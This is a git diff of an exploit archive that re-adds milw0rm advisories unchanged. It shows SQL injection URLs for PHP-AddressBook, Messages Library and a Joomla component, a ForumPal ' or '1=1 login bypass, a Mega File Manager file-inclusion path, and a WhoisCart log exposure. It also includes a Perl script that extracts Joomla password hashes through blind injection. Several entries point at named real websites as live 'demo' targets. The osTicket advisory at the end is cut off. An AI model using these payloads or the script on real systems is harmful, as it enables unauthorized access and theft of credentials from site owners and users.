-**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
-**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
-**							                                     **
-**    											     **
-**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
-**					 PROUD TO BE SPANISH!				     **
-**											     **
-***********************************************************************************************
-***********************************************************************************************
-
-----------------------------------------------------------------------------------------------
-|       	   	   MULTIPLE SQL INJECTION VULNERABILITIES	      	             |
-|--------------------------------------------------------------------------------------------|
-|                              |    PHP-AddressBook v-4.0.X       |  	                     |
-|  CMS INFORMATION:	        ----------------------------------	                     |
-|										             |
-|-->WEB: http://sourceforge.net/projects/php-addressbook/       	                     |
-|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/		                     |
-|-->DEMO: http://php-addressbook.sourceforge.net/demo/   	        		     |
-|-->CATEGORY: Address Book                                                                   |
-|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer.        |
-|		Manage groups, addresses, e-Mails, phone numbers & birthdays...    	     |
-|-->RELEASED: 2009-06-13								     |
-|											     |
-|  CMS VULNERABILITY:									     |
-|											     |
-|-->TESTED ON: firefox 3								     |
-|-->DORK: "php-addressbook"       					                     |
-|-->CATEGORY: SQL INJECTION      				                             |
-|-->AFFECT VERSION:  4.0.X				 			             |
-|-->Discovered Bug date: 2009-06-16							     |
-|-->Reported Bug date: 2009-06-16							     |
-|-->Fixed bug date: N/A									     |
-|-->Info patch (????): N/A					  			     |
-|-->Author: YEnH4ckEr									     |
-|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-|-->WEB/BLOG: N/A									     |
-|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
-|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
-----------------------------------------------------------------------------------------------
-
-
-
-Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest).
-
-
-
-#####################
-////////////////////
-
-SQL INJECTION VULN:
-
-////////////////////
-#####################
-
-
-
------------
-EXPLOITS:
------------
-
-
-
-<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
-
-
-
-
-[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23
-
-
-
-
-[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
-
-
-
-
-[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23
-
-
-
-<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>
-
-
-
-
-
-[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
-
-
-
-
--------------
-WATCH VIDEO:
--------------
-
-
-
-SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo
-
-
-
-
-<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
-
-
-
-
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-
-# milw0rm.com [2009-06-26]
+***********************************************************************************************
+***********************************************************************************************
+**	       										     **
+**  											     **
+**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
+** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
+**							                                     **
+**    											     **
+**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
+**					 PROUD TO BE SPANISH!				     **
+**											     **
+***********************************************************************************************
+***********************************************************************************************
+
+----------------------------------------------------------------------------------------------
+|       	   	   MULTIPLE SQL INJECTION VULNERABILITIES	      	             |
+|--------------------------------------------------------------------------------------------|
+|                              |    PHP-AddressBook v-4.0.X       |  	                     |
+|  CMS INFORMATION:	        ----------------------------------	                     |
+|										             |
+|-->WEB: http://sourceforge.net/projects/php-addressbook/       	                     |
+|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/		                     |
+|-->DEMO: http://php-addressbook.sourceforge.net/demo/   	        		     |
+|-->CATEGORY: Address Book                                                                   |
+|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer.        |
+|		Manage groups, addresses, e-Mails, phone numbers & birthdays...    	     |
+|-->RELEASED: 2009-06-13								     |
+|											     |
+|  CMS VULNERABILITY:									     |
+|											     |
+|-->TESTED ON: firefox 3								     |
+|-->DORK: "php-addressbook"       					                     |
+|-->CATEGORY: SQL INJECTION      				                             |
+|-->AFFECT VERSION:  4.0.X				 			             |
+|-->Discovered Bug date: 2009-06-16							     |
+|-->Reported Bug date: 2009-06-16							     |
+|-->Fixed bug date: N/A									     |
+|-->Info patch (????): N/A					  			     |
+|-->Author: YEnH4ckEr									     |
+|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+|-->WEB/BLOG: N/A									     |
+|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
+|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
+----------------------------------------------------------------------------------------------
+
+
+
+Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest).
+
+
+
+#####################
+////////////////////
+
+SQL INJECTION VULN:
+
+////////////////////
+#####################
+
+
+
+-----------
+EXPLOITS:
+-----------
+
+
+
+<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
+
+
+
+
+[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23
+
+
+
+
+[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
+
+
+
+
+[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23
+
+
+
+<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>
+
+
+
+
+
+[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23
+
+
+
+
+-------------
+WATCH VIDEO:
+-------------
+
+
+
+SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo
+
+
+
+
+<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
+
+
+
+
+##############################################################################
+##############################################################################
+##**************************************************************************##
+##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+
+# milw0rm.com [2009-06-26]
diff --git a/platforms/php/webapps/9024.txt b/platforms/php/webapps/9024.txt
index 7e6c78e8c..f6f5d3240 100755
--- a/platforms/php/webapps/9024.txt
+++ b/platforms/php/webapps/9024.txt
@@ -1,24 +1,24 @@
---------------------------------------------------------------
-ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability
----------------------------------------------------------------
-Founder :ThE g0bL!N
-Home:http://www.datachecknh.com
-Software :ForumPal v1.5
-Note: Je m'appel Tecktonik
----------------------------------------------------------------
-Exploit1:
--------
-Username: [Real_name_admin]
-Password:' or '1=1
-----------------------------------------------------------------
-Dem0
-----
-http://www.datachecknh.com/forumpal_FE_Demo/login.asp
-EXPLOIT fOR DEMO
-Username: admin
-Password:' or '1=1
---------------------------------------
-His0k4  - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r.
------------------------------------------------------------------
-
-# milw0rm.com [2009-06-26]
+--------------------------------------------------------------
+ForumPal v1.5( Auth Bypass) SQL Injection Vulnerability
+---------------------------------------------------------------
+Founder :ThE g0bL!N
+Home:http://www.datachecknh.com
+Software :ForumPal v1.5
+Note: Je m'appel Tecktonik
+---------------------------------------------------------------
+Exploit1:
+-------
+Username: [Real_name_admin]
+Password:' or '1=1
+----------------------------------------------------------------
+Dem0
+----
+http://www.datachecknh.com/forumpal_FE_Demo/login.asp
+EXPLOIT fOR DEMO
+Username: admin
+Password:' or '1=1
+--------------------------------------
+His0k4  - Dr-HTmL And Dos-Dz TeaM aND Snakes TeaM And Ev!L-C0d3r.
+-----------------------------------------------------------------
+
+# milw0rm.com [2009-06-26]
diff --git a/platforms/php/webapps/9025.txt b/platforms/php/webapps/9025.txt
index e10a0951d..820d1a7ef 100755
--- a/platforms/php/webapps/9025.txt
+++ b/platforms/php/webapps/9025.txt
@@ -1,18 +1,18 @@
-#################################################################################################################
-[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability
-[+] Discovered By SirGod
-[+] http://insecurity-ro.org
-#################################################################################################################
-
-[+] Homepage : http://www.awesomephp.com/?MegaFileManager
-
-[+] Note : The script is full of SQL Injection vulns,but I am tired to
-make querys now.
-
-[+] Local File Inclusion
-
-    http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00
-
-#################################################################################################################
-
-# milw0rm.com [2009-06-26]
+#################################################################################################################
+[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability
+[+] Discovered By SirGod
+[+] http://insecurity-ro.org
+#################################################################################################################
+
+[+] Homepage : http://www.awesomephp.com/?MegaFileManager
+
+[+] Note : The script is full of SQL Injection vulns,but I am tired to
+make querys now.
+
+[+] Local File Inclusion
+
+    http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00
+
+#################################################################################################################
+
+# milw0rm.com [2009-06-26]
diff --git a/platforms/php/webapps/9026.txt b/platforms/php/webapps/9026.txt
index f7526db43..0255da4a8 100755
--- a/platforms/php/webapps/9026.txt
+++ b/platforms/php/webapps/9026.txt
@@ -1,52 +1,52 @@
-+===================================================================================+
-            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
-            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
-            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
-             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
-              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
-            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
-+===================================================================================+
-|                                                                                   |
-|                                                                                   |
-|                     WHOISCART ADMIN BYPASS                                        |
-|                                                                                   |
-+===================================================================================+
-|                                                                                   |
-| Author.: Black Dream                                                              |
-| Contact: Be5_at_HoTMail_dot_Fr                                                    |
-| HoMe   : www.sec-r1z.com                                                          |
-|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
-+===================================================================================+
-|                                                                                   |
-| Script.: WHOISCART                                                                |
-| Home...: http://whoiscart.net                                                     |
-|                                                                                   |
-+-----------------------------------------------------------------------------------+
-|                                                                                   |
-| Exploit:                                                                          |
-|                                                                                   |
-| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
-|                                                                                   |
-| [+] Demo                                                                          |
-|                                                                                   |
-| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
-|                                                                                   |
-| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
-|                                                                                   |
-| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
-|                                                                                   |
-|                                                                                   |
-|                                                                                   |
-| [+] Now you see all cpanel[s] accout[pwd] xD   Pure admin                         |
-|                                                                                   |
-| [+] Enjoy xD                                                                      |             
-+-----------------------------------------------------------------------------------|
-
-+===================================================================================+
-|                                                                                   |
-| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
-|                       And All #sec-r1z memb3rz!!!!                                |
-+===================================================================================+
-E0D|F
-
-# milw0rm.com [2009-06-29]
++===================================================================================+
+            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
+            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
+            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
+             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
+              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
+            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
++===================================================================================+
+|                                                                                   |
+|                                                                                   |
+|                     WHOISCART ADMIN BYPASS                                        |
+|                                                                                   |
++===================================================================================+
+|                                                                                   |
+| Author.: Black Dream                                                              |
+| Contact: Be5_at_HoTMail_dot_Fr                                                    |
+| HoMe   : www.sec-r1z.com                                                          |
+|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
++===================================================================================+
+|                                                                                   |
+| Script.: WHOISCART                                                                |
+| Home...: http://whoiscart.net                                                     |
+|                                                                                   |
++-----------------------------------------------------------------------------------+
+|                                                                                   |
+| Exploit:                                                                          |
+|                                                                                   |
+| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
+|                                                                                   |
+| [+] Demo                                                                          |
+|                                                                                   |
+| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
+|                                                                                   |
+| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
+|                                                                                   |
+| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
+|                                                                                   |
+|                                                                                   |
+|                                                                                   |
+| [+] Now you see all cpanel[s] accout[pwd] xD   Pure admin                         |
+|                                                                                   |
+| [+] Enjoy xD                                                                      |             
++-----------------------------------------------------------------------------------|
+
++===================================================================================+
+|                                                                                   |
+| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
+|                       And All #sec-r1z memb3rz!!!!                                |
++===================================================================================+
+E0D|F
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9027.txt b/platforms/php/webapps/9027.txt
index 562337990..7fc323bb2 100755
--- a/platforms/php/webapps/9027.txt
+++ b/platforms/php/webapps/9027.txt
@@ -1,44 +1,44 @@
-+===================================================================================+
-            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
-            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
-            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
-             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
-              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
-            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
-+===================================================================================+
-|                                                                                   |
-|                                                                                   |
-|        Messages Library v2.0 Cat.php SQL Injection Vulnerabilities                |
-|                                                                                   |
-+===================================================================================+
-|                                                                                   |
-| Author.: Black Dream                                                              |
-| Contact: Be5_at_HoTMail_dot_Fr                                                    |
-| HoMe   : www.sec-r1z.com                                                          |
-|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
-+===================================================================================+
-|                                                                                   |
-| Script.: http://www.traidnt.net/vb/showthread.php?t=31814                         |
-|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 |
-|                                                                                   |
-+-----------------------------------------------------------------------------------+
-|                                                                                  
-| Exploit:                                                                          
-|                                                                                                                                                                    
-| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
-|                                                                                   
-| [+] Demo                                                                         
-|                                                                                   
-|                                                                                   
-| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor                                                                               
-|                                                                                                                                                    
-+-----------------------------------------------------------------------------------+
-
-+===================================================================================+
-|                                                                                   |
-| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
-|                       And All #sec-r1z memb3rz!!!!                                |
-+===================================================================================+
-E0D|F
-
-# milw0rm.com [2009-06-29]
++===================================================================================+
+            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
+            / /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
+            \ \_ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
+             \_ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
+              _______\  \_ _ \  \2_0_0_9 |      \  |  | /   /____  
+            /_ _ _ _ _\ _ _ _/\ _ _ _ /  |__|\ __\ |__|/_ _ _ _ _\
++===================================================================================+
+|                                                                                   |
+|                                                                                   |
+|        Messages Library v2.0 Cat.php SQL Injection Vulnerabilities                |
+|                                                                                   |
++===================================================================================+
+|                                                                                   |
+| Author.: Black Dream                                                              |
+| Contact: Be5_at_HoTMail_dot_Fr                                                    |
+| HoMe   : www.sec-r1z.com                                                          |
+|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
++===================================================================================+
+|                                                                                   |
+| Script.: http://www.traidnt.net/vb/showthread.php?t=31814                         |
+|Donwload: http://www.traidnt.net/vb/attachment.php?attachmentid=16341&d=1126191996 |
+|                                                                                   |
++-----------------------------------------------------------------------------------+
+|                                                                                  
+| Exploit:                                                                          
+|                                                                                                                                                                    
+| http://[website]/[script]/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor
+|                                                                                   
+| [+] Demo                                                                         
+|                                                                                   
+|                                                                                   
+| http://www.m3la.com/sms/cat.php?CatID=-1/**/UNION/**/SELECT/**/0,1,2,concat(Modname,0x3a,ModPassword),4,5/**/FROM/**/modretor                                                                               
+|                                                                                                                                                    
++-----------------------------------------------------------------------------------+
+
++===================================================================================+
+|                                                                                   |
+| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
+|                       And All #sec-r1z memb3rz!!!!                                |
++===================================================================================+
+E0D|F
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9028.txt b/platforms/php/webapps/9028.txt
index 239feb0c7..445dfd24f 100755
--- a/platforms/php/webapps/9028.txt
+++ b/platforms/php/webapps/9028.txt
@@ -1,118 +1,118 @@
-                       
-------------------------------------------------------------------------------
-Joomla Component com_php (id) Blind SQL-injection Vulnerability
-------------------------------------------------------------------------------
-
-
- #####################################################
- # [+] Author        :  Chip D3 Bi0s                 #
- # [+] Email         :  chipdebios[alt+64]gmail.com  #
- # [+] Vulnerability :  Blind SQL injection          #
- # [+] Group         :  LatinHackTeam                #
- #####################################################
-
-**********************************************************************
- Info Cms:
- * @name      : PHP Component
- * @author    : gabe@fijiwebdesign.com
- * @copyright : (c) fijiwebdesign.com
- * @license   : http://www.fijiwebdesign.com/
- * @dowloand : http://code.google.com/p/joomla-php/downloads/list
-**********************************************************************
-
-Example:
-http://localHost/path/index.php?option=com_php&Itemid=x&id=y<Sql Code>
-
-x = number Itemid valid
-y = number id valid
-
-<Sql code>:
-
-table jos_users:
-+and+(select+1+from+jos_users+limit+0,1)=1
-
-column password:
-+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
-
-column username:
-+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
-
-caracter ascii
-+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))>57
-
-etc, etc...
-
-DEMO LIVE:
-
-http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=1 
-true
-
-http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=2
-else
-
-http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58
-else
-
-http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57
-true
-
-note : in http://www.mercadominas.com.br
-x = number Itemid valid    : 70
-y = number id valid        : 131
-
-Date and 1=1 & not and 1=2 : com_search --->use script
-
-etc, etc....
-
-+++++++++++++++++++++++++++++++++++++++
-#[!] Produced in South America
-+++++++++++++++++++++++++++++++++++++++
-
-if you want to save the work, you can use the following script,	
-gives you password, you are free to modify it ;)
---------------------------------------------------------------------
-
-#!/usr/bin/perl -w
-use LWP::UserAgent;
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
-print "\t\t Joomla Component com_php (id) Blind SQL-injection        \n\n";
-print "\t\t-------------------------------------------------------------\n\n";
-print "[-] http://wwww.host.org/Path: ";
-chomp(my $target=<STDIN>);
-print "[-] Introduce Itemid: ";
-chomp($itemid=<STDIN>);
-print "[-] Introduce id: ";
-chomp($id=<STDIN>);
-print "[-] Dato para and 1=1 & no para and 1=2 : ";
-chomp($z=<STDIN>);
-
-print "[+] Password: ";
-$column_name="concat(password)";
-$table_name="jos_users";
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-
-for ($x=1;$x<=32;$x++)
-{            
-  for ($c=48;$c<=57;$c++) 
-{
- $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;
-
- my $res = $b->request(HTTP::Request->new(GET=>$host));
- my $content = $res->content;
- my $regexp = $z;
- if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
- }
-for ($c=97;$c<=102;$c++) 
-{
- $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;
- my $res = $b->request(HTTP::Request->new(GET=>$host));
- my $content = $res->content;
- my $regexp = $z;
- if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
- }
-}
-
-# milw0rm.com [2009-06-29]
+                       
+------------------------------------------------------------------------------
+Joomla Component com_php (id) Blind SQL-injection Vulnerability
+------------------------------------------------------------------------------
+
+
+ #####################################################
+ # [+] Author        :  Chip D3 Bi0s                 #
+ # [+] Email         :  chipdebios[alt+64]gmail.com  #
+ # [+] Vulnerability :  Blind SQL injection          #
+ # [+] Group         :  LatinHackTeam                #
+ #####################################################
+
+**********************************************************************
+ Info Cms:
+ * @name      : PHP Component
+ * @author    : gabe@fijiwebdesign.com
+ * @copyright : (c) fijiwebdesign.com
+ * @license   : http://www.fijiwebdesign.com/
+ * @dowloand : http://code.google.com/p/joomla-php/downloads/list
+**********************************************************************
+
+Example:
+http://localHost/path/index.php?option=com_php&Itemid=x&id=y<Sql Code>
+
+x = number Itemid valid
+y = number id valid
+
+<Sql code>:
+
+table jos_users:
++and+(select+1+from+jos_users+limit+0,1)=1
+
+column password:
++and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1
+
+column username:
++and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
+
+caracter ascii
++and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))>57
+
+etc, etc...
+
+DEMO LIVE:
+
+http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=1 
+true
+
+http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=2
+else
+
+http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58
+else
+
+http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57
+true
+
+note : in http://www.mercadominas.com.br
+x = number Itemid valid    : 70
+y = number id valid        : 131
+
+Date and 1=1 & not and 1=2 : com_search --->use script
+
+etc, etc....
+
++++++++++++++++++++++++++++++++++++++++
+#[!] Produced in South America
++++++++++++++++++++++++++++++++++++++++
+
+if you want to save the work, you can use the following script,	
+gives you password, you are free to modify it ;)
+--------------------------------------------------------------------
+
+#!/usr/bin/perl -w
+use LWP::UserAgent;
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
+print "\t\t Joomla Component com_php (id) Blind SQL-injection        \n\n";
+print "\t\t-------------------------------------------------------------\n\n";
+print "[-] http://wwww.host.org/Path: ";
+chomp(my $target=<STDIN>);
+print "[-] Introduce Itemid: ";
+chomp($itemid=<STDIN>);
+print "[-] Introduce id: ";
+chomp($id=<STDIN>);
+print "[-] Dato para and 1=1 & no para and 1=2 : ";
+chomp($z=<STDIN>);
+
+print "[+] Password: ";
+$column_name="concat(password)";
+$table_name="jos_users";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+
+for ($x=1;$x<=32;$x++)
+{            
+  for ($c=48;$c<=57;$c++) 
+{
+ $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;
+
+ my $res = $b->request(HTTP::Request->new(GET=>$host));
+ my $content = $res->content;
+ my $regexp = $z;
+ if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
+ }
+for ($c=97;$c<=102;$c++) 
+{
+ $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;
+ my $res = $b->request(HTTP::Request->new(GET=>$host));
+ my $content = $res->content;
+ my $regexp = $z;
+ if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
+ }
+}
+
+# milw0rm.com [2009-06-29]
diff --git a/platforms/php/webapps/9032.txt b/platforms/php/webapps/9032.txt
index 589e5da9d..f8ec1dbf0 100755
--- a/platforms/php/webapps/9032.txt
+++ b/platforms/php/webapps/9032.txt
@@ -1,38 +1,38 @@
-nGenuity Information Services - Security Advisory
-
-   Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection
-   Application: osTicket v1.6 RC4
-        Vendor: osTicket
-Vendor website: http://www.osticket.com
-        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
-
-  I. BACKGROUND
-    "osTicket is a widely-used open source support ticket system. It seamlessly
-    integrates inquiries created via email and web-based forms into a simple
-    easy to use multi-user web interface. Easily manage, organize and archive
-    all your support requests and responses in one place while providing your
-    clients with accountability and responsiveness they deserve." [1]
-
-  II. DETAILS
-    osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which
-    can be abused to execute a blind sql injection attack by an unauthenticated
-    attacker.
-
-    The vendor has provided a new release v1.6 RC5 which addresses this vulnerability.
-    They have also provided patching instructions [2] should you be unable to perform
-    a full upgrade at this time.
-
-    One sample attack string might look similar to the following:
-    '+(SELECT IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
-    FROM ost_staff where staff_id=1) and '1'='1
-
-  III. REFERENCES
-    [1] - http://www.osticket.com
-    [2] - http://osticket.com/forums/project.php?issueid=118
-
-  IV. VENDOR COMMUNICATION
-    3.25.2009 - Vulnerability Discovery
-    3.25.2009 - Vendor notification & initial vendor response
-    6.26.2009 - Vendor releases fix in osTicket v1.6 RC5 
-
-# milw0rm.com [2009-06-29]
+nGenuity Information Services - Security Advisory
+
+   Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection
+   Application: osTicket v1.6 RC4
+        Vendor: osTicket
+Vendor website: http://www.osticket.com
+        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
+
+  I. BACKGROUND
+    "osTicket is a widely-used open source support ticket system. It seamlessly
+    integrates inquiries created via email and web-based forms into a simple
+    easy to use multi-user web interface. Easily manage, organize and archive
+    all your support requests and responses in one place while providing your
+    clients with accountability and responsiveness they deserve." [1]
+
+  II. DETAILS
+    osTicket prior to v1.6 RC5 fails to validate / escape staff usernames which
